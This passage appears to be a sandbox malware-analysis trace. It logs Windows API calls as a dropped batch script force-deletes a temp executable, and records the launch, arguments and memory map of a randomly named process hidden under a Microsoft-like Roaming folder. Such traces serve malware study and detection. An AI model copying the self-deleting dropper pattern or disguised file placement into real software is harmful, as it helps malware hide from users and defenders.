lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0102.963] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22f0bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.963] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22e14c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.963] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e37c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e380, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e37c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0102.963] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0102.963] _wcsicmp (_String1="CNuu8Vyt.exe", _String2=".") returned 53 [0102.963] _wcsicmp (_String1="CNuu8Vyt.exe", _String2="..") returned 53 [0102.963] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x2020 [0102.963] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x392148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.963] SetErrorMode (uMode=0x0) returned 0x0 [0102.963] SetErrorMode (uMode=0x1) returned 0x0 [0102.963] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", nBufferLength=0x104, lpBuffer=0x22e7a0, lpFilePart=0x22e788 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", lpFilePart=0x22e788*="CNuu8Vyt.exe") returned 0x30 [0102.964] SetErrorMode (uMode=0x0) returned 0x1 [0102.964] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0102.964] _wcsicmp (_String1="CNuu8Vyt.exe", _String2=".") returned 53 [0102.964] _wcsicmp (_String1="CNuu8Vyt.exe", _String2="..") returned 53 [0102.964] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x2020 [0102.964] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", fInfoLevelId=0x0, lpFindFileData=0x3a0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a0554) returned 0x380aa8 [0102.964] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 1 [0102.965] FindNextFileW (in: hFindFile=0x380aa8, lpFindFileData=0x3a0554 | out: lpFindFileData=0x3a0554) returned 0 [0102.965] GetLastError () returned 0x12 [0102.965] FindClose (in: hFindFile=0x380aa8 | out: hFindFile=0x380aa8) returned 1 [0102.966] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.966] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0102.966] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.966] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0102.966] _get_osfhandle (_FileHandle=0) 
returned 0x3 [0102.966] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0102.966] SetConsoleInputExeNameW () returned 0x1 [0102.966] GetConsoleOutputCP () returned 0x1b5 [0102.967] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0102.967] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.967] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\dgaezhhx.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f73c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0102.967] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0102.967] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.967] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0102.967] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.967] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0102.967] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f720, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f720*=0x3e, lpOverlapped=0x0) returned 1 [0102.967] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n") returned 62 [0102.967] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.967] GetFileType (hFile=0x54) returned 0x1 [0102.968] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.968] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) 
returned 0x91 [0102.969] _tell (_FileHandle=3) returned 145 [0102.969] _close (_FileHandle=3) returned 0 [0102.969] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f4f4 | out: _Buffer="\r\n") returned 2 [0102.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.969] GetFileType (hFile=0x7) returned 0x2 [0102.969] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.969] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b4 | out: lpMode=0x22f4b4) returned 1 [0102.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.969] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f4e0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f4e0*=0x2) returned 1 [0102.970] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.970] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f4f0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0102.970] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f4f0 | out: _Buffer=">") returned 1 [0102.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.970] GetFileType (hFile=0x7) returned 0x2 [0102.970] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.970] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b8 | out: lpMode=0x22f4b8) returned 1 [0102.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.970] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f4e4, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f4e4*=0x19) returned 1 [0102.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.970] GetFileType (hFile=0x7) returned 0x2 [0102.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.971] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f73c | 
out: lpMode=0x22f73c) returned 1 [0102.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.971] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x39f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f768, lpReserved=0x0 | out: lpBuffer=0x39f008*, lpNumberOfCharsWritten=0x22f768*=0x3) returned 1 [0102.971] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f774 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" ") returned 58 [0102.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.971] GetFileType (hFile=0x7) returned 0x2 [0102.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.971] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f734 | out: lpMode=0x22f734) returned 1 [0102.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.971] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f760, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f760*=0x3a) returned 1 [0102.972] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f794 | out: _Buffer="\r\n") returned 2 [0102.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.972] GetFileType (hFile=0x7) returned 0x2 [0102.972] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.972] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f754 | out: lpMode=0x22f754) returned 1 [0102.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.972] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f780, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f780*=0x2) returned 1 [0102.972] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0102.972] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0102.972] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0102.972] GetConsoleTitleW (in: lpConsoleTitle=0x22f304, 
nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0102.973] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22f0bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.973] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22e14c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.973] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e37c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e380, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e37c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0102.973] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0102.973] _wcsicmp (_String1="CNuu8Vyt.exe", _String2=".") returned 53 [0102.973] _wcsicmp (_String1="CNuu8Vyt.exe", _String2="..") returned 53 [0102.973] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0xffffffff [0102.973] GetLastError () returned 0x2 [0102.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x392148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.973] SetErrorMode (uMode=0x0) returned 0x0 [0102.973] SetErrorMode (uMode=0x1) returned 0x0 [0102.974] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", nBufferLength=0x104, lpBuffer=0x22e7a0, lpFilePart=0x22e788 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", lpFilePart=0x22e788*="CNuu8Vyt.exe") returned 0x30 [0102.974] SetErrorMode (uMode=0x0) returned 0x1 [0102.974] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0102.974] _wcsicmp (_String1="CNuu8Vyt.exe", _String2=".") 
returned 53 [0102.974] _wcsicmp (_String1="CNuu8Vyt.exe", _String2="..") returned 53 [0102.974] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0xffffffff [0102.974] GetLastError () returned 0x2 [0102.974] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", fInfoLevelId=0x0, lpFindFileData=0x3a0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a0554) returned 0xffffffff [0102.974] GetLastError () returned 0x2 [0102.974] _get_osfhandle (_FileHandle=2) returned 0xb [0102.974] GetFileType (hFile=0xb) returned 0x2 [0102.974] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0102.974] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22ed7c | out: lpMode=0x22ed7c) returned 1 [0102.975] _get_osfhandle (_FileHandle=2) returned 0xb [0102.975] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22edb0 | out: lpConsoleScreenBufferInfo=0x22edb0) returned 1 [0102.975] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0102.975] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x22edf0 | out: lpBuffer="Could Not Find C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\r\n") returned 0x41 [0102.975] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x22edd4, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22edd4*=0x41) returned 1 [0102.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.976] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0102.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.976] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0102.976] _get_osfhandle (_FileHandle=0) returned 0x3 [0102.976] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0102.977] SetConsoleInputExeNameW () returned 0x1 [0102.977] GetConsoleOutputCP () returned 0x1b5 [0102.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0102.977] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.977] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\dgaezhhx.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f73c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0102.977] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0102.977] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.977] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.977] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.978] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f720, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f720*=0x0, lpOverlapped=0x0) returned 1 [0102.978] GetLastError () returned 0x0 [0102.978] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] GetFileType (hFile=0x54) returned 0x1 [0102.978] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.978] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] SetFilePointer (in: 
hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.978] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f704, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f704*=0x0, lpOverlapped=0x0) returned 1 [0102.978] GetLastError () returned 0x0 [0102.978] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] GetFileType (hFile=0x54) returned 0x1 [0102.978] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.978] longjmp () [0102.978] _tell (_FileHandle=3) returned 145 [0102.979] _close (_FileHandle=3) returned 0 [0102.979] CmdBatNotification () returned 0x0 [0102.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.979] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0102.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.979] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0102.979] _get_osfhandle (_FileHandle=0) returned 0x3 [0102.979] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0102.979] SetConsoleInputExeNameW () returned 0x1 [0102.979] GetConsoleOutputCP () returned 0x1b5 [0102.980] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0102.980] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.980] exit (_Code=0) Process: id = "19" image_name = "lsfkrhur.exe" filename = "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe" page_root = "0x7ea168e0" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xb34" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1294 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1295 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1296 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1297 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "lsfkrhur.exe" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe") Region: id = 1298 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1299 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1300 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1301 start_va = 0x7ffd7000 end_va = 0x7ffd7fff 
entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1302 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1303 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1304 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1305 start_va = 0x260000 end_va = 0x2c6fff entry_point = 0x260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1306 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1307 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1308 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1309 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1310 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1311 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" 
(normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1312 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1313 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1314 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1324 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1325 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1326 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1327 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1328 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1329 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1330 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1331 start_va = 0x11a0000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename 
= "" Region: id = 1457 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1458 start_va = 0x11a0000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1459 start_va = 0x1380000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 1486 start_va = 0x1250000 end_va = 0x132efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Region: id = 1487 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1488 start_va = 0x150000 end_va = 0x152fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1489 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Thread: id = 25 os_tid = 0xba8 [0097.421] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x78133b60, dwHighDateTime=0x1d440a9)) [0097.421] GetCurrentProcessId () returned 0xba4 [0097.421] GetCurrentThreadId () returned 0xba8 [0097.421] GetTickCount () returned 0x23429 [0097.421] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15421059421) returned 1 [0097.422] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0097.422] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0097.423] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0097.423] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0097.423] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0097.423] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0097.423] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0097.424] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0097.425] 